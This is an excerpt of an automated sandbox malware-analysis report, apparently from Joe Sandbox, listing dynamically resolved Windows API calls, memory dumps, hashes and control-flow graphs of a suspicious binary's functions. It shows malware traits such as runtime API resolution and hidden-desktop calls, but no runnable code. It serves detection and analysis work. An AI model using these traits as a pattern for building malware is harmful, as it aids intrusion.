                                  • GetProcAddress.KERNEL32(74DD0000,011CCF50), ref: 002D68DC
                                  • GetProcAddress.KERNEL32(74DD0000,011CCF68), ref: 002D68F4
                                  • GetProcAddress.KERNEL32(74DD0000,011CD0E8), ref: 002D690C
                                  • GetProcAddress.KERNEL32(74DD0000,011B5890), ref: 002D6925
                                  • GetProcAddress.KERNEL32(74DD0000,011CCF08), ref: 002D693D
                                  • GetProcAddress.KERNEL32(74DD0000,011CD118), ref: 002D6955
                                  • GetProcAddress.KERNEL32(74DD0000,011CD0B8), ref: 002D696E
                                  • GetProcAddress.KERNEL32(74DD0000,011CD130), ref: 002D6986
                                  • GetProcAddress.KERNEL32(74DD0000,011CCF38), ref: 002D699E
                                  • GetProcAddress.KERNEL32(74DD0000,011CD190), ref: 002D69B7
                                  • GetProcAddress.KERNEL32(74DD0000,011CCF80), ref: 002D69CF
                                  • GetProcAddress.KERNEL32(74DD0000,011CD058), ref: 002D69E7
                                  • GetProcAddress.KERNEL32(74DD0000,011CCFC8), ref: 002D6A00
                                  • GetProcAddress.KERNEL32(74DD0000,011CA650), ref: 002D6A18
                                  • GetProcAddress.KERNEL32(74DD0000,011CD1A8), ref: 002D6A30
                                  • GetProcAddress.KERNEL32(74DD0000,011CCF98), ref: 002D6A49
                                  • GetProcAddress.KERNEL32(74DD0000,011B58B0), ref: 002D6A61
                                  • GetProcAddress.KERNEL32(74DD0000,011CCFE0), ref: 002D6A79
                                  • GetProcAddress.KERNEL32(74DD0000,011B5950), ref: 002D6A92
                                  • GetProcAddress.KERNEL32(74DD0000,011CCFF8), ref: 002D6AAA
                                  • GetProcAddress.KERNEL32(74DD0000,011CD0D0), ref: 002D6AC2
                                  • GetProcAddress.KERNEL32(74DD0000,011B5970), ref: 002D6ADB
                                  • GetProcAddress.KERNEL32(74DD0000,011B5BD0), ref: 002D6AF3
                                  • LoadLibraryA.KERNEL32(011CD070,002D051F), ref: 002D6B05
                                  • LoadLibraryA.KERNEL32(011CD148), ref: 002D6B16
                                  • LoadLibraryA.KERNEL32(011CD160), ref: 002D6B28
                                  • LoadLibraryA.KERNEL32(011CD1C0), ref: 002D6B3A
                                  • LoadLibraryA.KERNEL32(011CD1D8), ref: 002D6B4B
                                  • LoadLibraryA.KERNEL32(011CD010), ref: 002D6B5D
                                  • LoadLibraryA.KERNEL32(011CCF20), ref: 002D6B6F
                                  • LoadLibraryA.KERNEL32(011CD1F0), ref: 002D6B80
                                  • GetProcAddress.KERNEL32(75290000,011B5B90), ref: 002D6B9C
                                  • GetProcAddress.KERNEL32(75290000,011CD280), ref: 002D6BB4
                                  • GetProcAddress.KERNEL32(75290000,011C90A8), ref: 002D6BCD
                                  • GetProcAddress.KERNEL32(75290000,011CD298), ref: 002D6BE5
                                  • GetProcAddress.KERNEL32(75290000,011B5E50), ref: 002D6BFD
                                  • GetProcAddress.KERNEL32(6FC70000,011BB9C8), ref: 002D6C1D
                                  • GetProcAddress.KERNEL32(6FC70000,011B5C90), ref: 002D6C35
                                  • GetProcAddress.KERNEL32(6FC70000,011BB900), ref: 002D6C4E
                                  • GetProcAddress.KERNEL32(6FC70000,011CD490), ref: 002D6C66
                                  • GetProcAddress.KERNEL32(6FC70000,011CD430), ref: 002D6C7E
                                  • GetProcAddress.KERNEL32(6FC70000,011B5C10), ref: 002D6C97
                                  • GetProcAddress.KERNEL32(6FC70000,011B5CB0), ref: 002D6CAF
                                  • GetProcAddress.KERNEL32(6FC70000,011CD3A0), ref: 002D6CC7
                                  • GetProcAddress.KERNEL32(752C0000,011B5BF0), ref: 002D6CE3
                                  • GetProcAddress.KERNEL32(752C0000,011B5D50), ref: 002D6CFB
                                  • GetProcAddress.KERNEL32(752C0000,011CD2C8), ref: 002D6D14
                                  • GetProcAddress.KERNEL32(752C0000,011CD448), ref: 002D6D2C
                                  • GetProcAddress.KERNEL32(752C0000,011B5E10), ref: 002D6D44
                                  • GetProcAddress.KERNEL32(74EC0000,011BB748), ref: 002D6D64
                                  • GetProcAddress.KERNEL32(74EC0000,011BBA40), ref: 002D6D7C
                                  • GetProcAddress.KERNEL32(74EC0000,011CD358), ref: 002D6D95
                                  • GetProcAddress.KERNEL32(74EC0000,011B5E30), ref: 002D6DAD
                                  • GetProcAddress.KERNEL32(74EC0000,011B5AB0), ref: 002D6DC5
                                  • GetProcAddress.KERNEL32(74EC0000,011BB950), ref: 002D6DDE
                                  • GetProcAddress.KERNEL32(75BD0000,011CD2B0), ref: 002D6DFE
                                  • GetProcAddress.KERNEL32(75BD0000,011B5D70), ref: 002D6E16
                                  • GetProcAddress.KERNEL32(75BD0000,011C8FF8), ref: 002D6E2F
                                  • GetProcAddress.KERNEL32(75BD0000,011CD2E0), ref: 002D6E47
                                  • GetProcAddress.KERNEL32(75BD0000,011CD400), ref: 002D6E5F
                                  • GetProcAddress.KERNEL32(75BD0000,011B5D90), ref: 002D6E78
                                  • GetProcAddress.KERNEL32(75BD0000,011B5AD0), ref: 002D6E90
                                  • GetProcAddress.KERNEL32(75BD0000,011CD208), ref: 002D6EA8
                                  • GetProcAddress.KERNEL32(75BD0000,011CD3E8), ref: 002D6EC1
                                  • GetProcAddress.KERNEL32(75BD0000,CreateDesktopA), ref: 002D6ED7
                                  • GetProcAddress.KERNEL32(75BD0000,OpenDesktopA), ref: 002D6EEE
                                  • GetProcAddress.KERNEL32(75BD0000,CloseDesktop), ref: 002D6F05
                                  • GetProcAddress.KERNEL32(75A70000,011B5AF0), ref: 002D6F21
                                  • GetProcAddress.KERNEL32(75A70000,011CD310), ref: 002D6F39
                                  • GetProcAddress.KERNEL32(75A70000,011CD220), ref: 002D6F52
                                  • GetProcAddress.KERNEL32(75A70000,011CD340), ref: 002D6F6A
                                  • GetProcAddress.KERNEL32(75A70000,011CD2F8), ref: 002D6F82
                                  • GetProcAddress.KERNEL32(75450000,011B5B50), ref: 002D6F9E
                                  • GetProcAddress.KERNEL32(75450000,011B5D30), ref: 002D6FB6
                                  • GetProcAddress.KERNEL32(75DA0000,011B5C70), ref: 002D6FD2
                                  • GetProcAddress.KERNEL32(75DA0000,011CD328), ref: 002D6FEA
                                  • GetProcAddress.KERNEL32(6F070000,011B5B70), ref: 002D700A
                                  • GetProcAddress.KERNEL32(6F070000,011B5CD0), ref: 002D7022
                                  • GetProcAddress.KERNEL32(6F070000,011B5CF0), ref: 002D703B
                                  • GetProcAddress.KERNEL32(6F070000,011CD3B8), ref: 002D7053
                                  • GetProcAddress.KERNEL32(6F070000,011B5D10), ref: 002D706B
                                  • GetProcAddress.KERNEL32(6F070000,011B5BB0), ref: 002D7084
                                  • GetProcAddress.KERNEL32(6F070000,011B5C30), ref: 002D709C
                                  • GetProcAddress.KERNEL32(6F070000,011B5B10), ref: 002D70B4
                                  • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 002D70CB
                                  • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 002D70E2
                                  • GetProcAddress.KERNEL32(75AF0000,011CD4D8), ref: 002D70FE
                                  • GetProcAddress.KERNEL32(75AF0000,011C9058), ref: 002D7116
                                  • GetProcAddress.KERNEL32(75AF0000,011CD4A8), ref: 002D712F
                                  • GetProcAddress.KERNEL32(75AF0000,011CD460), ref: 002D7147
                                  • GetProcAddress.KERNEL32(75D90000,011B5DB0), ref: 002D7163
                                  • GetProcAddress.KERNEL32(6CE20000,011CD418), ref: 002D717F
                                  • GetProcAddress.KERNEL32(6CE20000,011B5B30), ref: 002D7197
                                  • GetProcAddress.KERNEL32(6CE20000,011CD268), ref: 002D71B0
                                  • GetProcAddress.KERNEL32(6CE20000,011CD370), ref: 002D71C8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: CloseDesktop$CreateDesktopA$HttpQueryInfoA$InternetSetOptionA$OpenDesktopA
                                  • API String ID: 2238633743-3468015613
                                  • Opcode ID: 52ecbf54fd86e461aabc5fd91a2e8beceb5a33e66e81fe75a67db6a77e2e6585
                                  • Instruction ID: 667fcae9e0536bbe77a2b8e504c1703e435e8364f1818cbe750af4b9517e84a6
                                  • Opcode Fuzzy Hash: 52ecbf54fd86e461aabc5fd91a2e8beceb5a33e66e81fe75a67db6a77e2e6585
                                  • Instruction Fuzzy Hash: BF6252F56102819FDB54DF65EDC8A2637B9F7882013508A3DE959CB3A3DB34AD00DB68
                                  Function 002CF1B0 Relevance: 102.7, APIs: 57, Strings: 1, Instructions: 1156stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrlen.KERNEL32(002DCFEC), ref: 002CF1D5
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002CF1F1
                                  • lstrlen.KERNEL32(002DCFEC), ref: 002CF1FC
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002CF215
                                  • lstrlen.KERNEL32(002DCFEC), ref: 002CF220
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002CF239
                                  • lstrcpy.KERNEL32(00000000,002E4FA0), ref: 002CF25E
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002CF28C
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002CF2C0
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002CF2F0
                                  • lstrlen.KERNEL32(011B5A10), ref: 002CF315
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen
                                  • String ID: ERROR
                                  • API String ID: 367037083-2861137601
                                  • Opcode ID: fe98199e6a84d92dfaeb3f780691d3c4481584baff7bcb1eb5d5097888a899ac
                                  • Instruction ID: ea62654d55faf229c2224cfc9546d6c86e9ecf77599863a96417f056f8b356ac
                                  • Opcode Fuzzy Hash: fe98199e6a84d92dfaeb3f780691d3c4481584baff7bcb1eb5d5097888a899ac
                                  • Instruction Fuzzy Hash: 23A27E709212428FDB64DF64DA88F5AB7B6AF44340F29817DE849DB3A2DB31DC61CB50
                                  Function 002CFFD0 Relevance: 63.1, APIs: 40, Strings: 1, Instructions: 1571stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002D0013
                                  • lstrlen.KERNEL32(002DCFEC), ref: 002D00BD
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002D00E1
                                  • lstrlen.KERNEL32(002DCFEC), ref: 002D00EC
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002D0110
                                  • lstrlen.KERNEL32(002DCFEC), ref: 002D011B
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002D013F
                                  • lstrlen.KERNEL32(002DCFEC), ref: 002D015A
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002D0189
                                  • lstrlen.KERNEL32(002DCFEC), ref: 002D0194
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002D01C3
                                  • lstrlen.KERNEL32(002DCFEC), ref: 002D01CE
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002D0206
                                  • lstrlen.KERNEL32(002DCFEC), ref: 002D0250
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002D0288
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002D059B
                                  • lstrlen.KERNEL32(011B5870), ref: 002D05AB
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002D05D7
                                  • lstrcat.KERNEL32(00000000,?), ref: 002D05E3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002D060E
                                  • lstrlen.KERNEL32(011CE478), ref: 002D0625
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002D064C
                                  • lstrcat.KERNEL32(00000000,?), ref: 002D0658
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002D0681
                                  • lstrlen.KERNEL32(011B57D0), ref: 002D0698
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002D06C9
                                  • lstrcat.KERNEL32(00000000,?), ref: 002D06D5
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002D0706
                                  • lstrcpy.KERNEL32(00000000,011C8F68), ref: 002D074B
                                    • Part of subcall function 002B1530: lstrcpy.KERNEL32(00000000,?), ref: 002B1557
                                    • Part of subcall function 002B1530: lstrcpy.KERNEL32(00000000,?), ref: 002B1579
                                    • Part of subcall function 002B1530: lstrcpy.KERNEL32(00000000,?), ref: 002B159B
                                    • Part of subcall function 002B1530: lstrcpy.KERNEL32(00000000,?), ref: 002B15FF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002D077F
                                  • lstrcpy.KERNEL32(00000000,011CE490), ref: 002D07E7
                                  • lstrcpy.KERNEL32(00000000,011C9238), ref: 002D0858
                                  • lstrcpy.KERNEL32(00000000,fplugins), ref: 002D08CF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002D0928
                                  • lstrcpy.KERNEL32(00000000,011C9248), ref: 002D09F8
                                    • Part of subcall function 002B24E0: lstrcpy.KERNEL32(00000000,?), ref: 002B2528
                                    • Part of subcall function 002B24E0: lstrcpy.KERNEL32(00000000,?), ref: 002B254E
                                    • Part of subcall function 002B24E0: lstrcpy.KERNEL32(00000000,?), ref: 002B2577
                                  • lstrcpy.KERNEL32(00000000,011C9298), ref: 002D0ACE
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002D0B81
                                  • lstrcpy.KERNEL32(00000000,011C9298), ref: 002D0D58
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$lstrcat
                                  • String ID: fplugins
                                  • API String ID: 2500673778-38756186
                                  • Opcode ID: 535f104f5b432d1ea8843f6d6937115c6878a52d4865d0b91e6a226d0076c7c9
                                  • Instruction ID: 5064141f1faa5db1803fb9885aff83f65aa58bdc8d4f1754d60b868b3e4c1d48
                                  • Opcode Fuzzy Hash: 535f104f5b432d1ea8843f6d6937115c6878a52d4865d0b91e6a226d0076c7c9
                                  • Instruction Fuzzy Hash: BEE228709253428FD724DF29C488BAAB7E1BF88314F58856ED48D8B362DB319C65CF52
                                  Function 002CF2F8 Relevance: 30.1, APIs: 16, Strings: 1, Instructions: 391stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrlen.KERNEL32(011B5A10), ref: 002CF315
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002CF3A3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002CF3C7
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002CF47B
                                  • lstrcpy.KERNEL32(00000000,011B5A10), ref: 002CF4BB
                                  • lstrcpy.KERNEL32(00000000,011C8F38), ref: 002CF4EA
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002CF59E
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 002CF61C
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002CF64C
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002CF69A
                                  • StrCmpCA.SHLWAPI(?,ERROR), ref: 002CF718
                                  • lstrlen.KERNEL32(011C8F78), ref: 002CF746
                                  • lstrcpy.KERNEL32(00000000,011C8F78), ref: 002CF771
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002CF793
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002CF7E4
                                  • StrCmpCA.SHLWAPI(?,ERROR), ref: 002CFA32
                                  • lstrlen.KERNEL32(011C8F28), ref: 002CFA60
                                  • lstrcpy.KERNEL32(00000000,011C8F28), ref: 002CFA8B
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002CFAAD
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002CFAFE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen
                                  • String ID: ERROR
                                  • API String ID: 367037083-2861137601
                                  • Opcode ID: 302dcabb667ad6bbb017dbbdd9d5334fd9452813761dd876c3eca5876c9e48ea
                                  • Instruction ID: dcf453600335f0a2edced038999d0d6237889175b39eee592ac9293e191b385b
                                  • Opcode Fuzzy Hash: 302dcabb667ad6bbb017dbbdd9d5334fd9452813761dd876c3eca5876c9e48ea
                                  • Instruction Fuzzy Hash: 12F13C30921642CFDBA4CF25CA84B65B7E6BF44314B2982BED4099B3A2D731DC52CB54
                                  Function 002C8CA0 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 176COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2721 2c8ca0-2c8cc4 StrCmpCA 2722 2c8ccd-2c8ce6 2721->2722 2723 2c8cc6-2c8cc7 ExitProcess 2721->2723 2725 2c8cec-2c8cf1 2722->2725 2726 2c8ee2-2c8eef call 2b2a20 2722->2726 2727 2c8cf6-2c8cf9 2725->2727 2730 2c8cff 2727->2730 2731 2c8ec3-2c8edc 2727->2731 2732 2c8e6f-2c8e7d StrCmpCA 2730->2732 2733 2c8e88-2c8e9a lstrlen 2730->2733 2734 2c8d84-2c8d92 StrCmpCA 2730->2734 2735 2c8da4-2c8db8 StrCmpCA 2730->2735 2736 2c8d06-2c8d15 lstrlen 2730->2736 2737 2c8dbd-2c8dcb StrCmpCA 2730->2737 2738 2c8ddd-2c8deb StrCmpCA 2730->2738 2739 2c8dfd-2c8e0b StrCmpCA 2730->2739 2740 2c8e1d-2c8e2b StrCmpCA 2730->2740 2741 2c8e3d-2c8e4b StrCmpCA 2730->2741 2742 2c8d5a-2c8d69 lstrlen 2730->2742 2743 2c8e56-2c8e64 StrCmpCA 2730->2743 2744 2c8d30-2c8d3f lstrlen 2730->2744 2731->2726 2769 2c8cf3 2731->2769 2732->2731 2745 2c8e7f-2c8e86 2732->2745 2746 2c8e9c-2c8ea1 call 2b2a20 2733->2746 2747 2c8ea4-2c8eb0 call 2b2930 2733->2747 2734->2731 2753 2c8d98-2c8d9f 2734->2753 2735->2731 2758 2c8d1f-2c8d2b call 2b2930 2736->2758 2759 2c8d17-2c8d1c call 2b2a20 2736->2759 2737->2731 2754 2c8dd1-2c8dd8 2737->2754 2738->2731 2755 2c8df1-2c8df8 2738->2755 2739->2731 2756 2c8e11-2c8e18 2739->2756 2740->2731 2757 2c8e31-2c8e38 2740->2757 2741->2731 2760 2c8e4d-2c8e54 2741->2760 2750 2c8d6b-2c8d70 call 2b2a20 2742->2750 2751 2c8d73-2c8d7f call 2b2930 2742->2751 2743->2731 2761 2c8e66-2c8e6d 2743->2761 2748 2c8d49-2c8d55 call 2b2930 2744->2748 2749 2c8d41-2c8d46 call 2b2a20 2744->2749 2745->2731 2746->2747 2779 2c8eb3-2c8eb5 2747->2779 2748->2779 2749->2748 2750->2751 2751->2779 2753->2731 2754->2731 2755->2731 2756->2731 2757->2731 2758->2779 2759->2758 2760->2731 2761->2731 2769->2727 2779->2731 2780 2c8eb7-2c8eb9 2779->2780 2780->2731 2781 2c8ebb-2c8ebd lstrcpy 2780->2781 2781->2731
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcess
                                  • String ID: block
                                  • API String ID: 621844428-2199623458
                                  • Opcode ID: b176d69c948713ce157bb4d376cb90bcaa9943e187e4eec95c835ec12115a24b
                                  • Instruction ID: e6e10e688c385149b37e4c3b0b75026d3ef3b705c3ed6e3b702733d1ab5dd54c
                                  • Opcode Fuzzy Hash: b176d69c948713ce157bb4d376cb90bcaa9943e187e4eec95c835ec12115a24b
                                  • Instruction Fuzzy Hash: 8851BD30A24B42DBCB21AF75DC84F6B7BF4BB04704B60896DF582D7641DBB4E8618B24
                                  Function 002D2740 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 93memoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
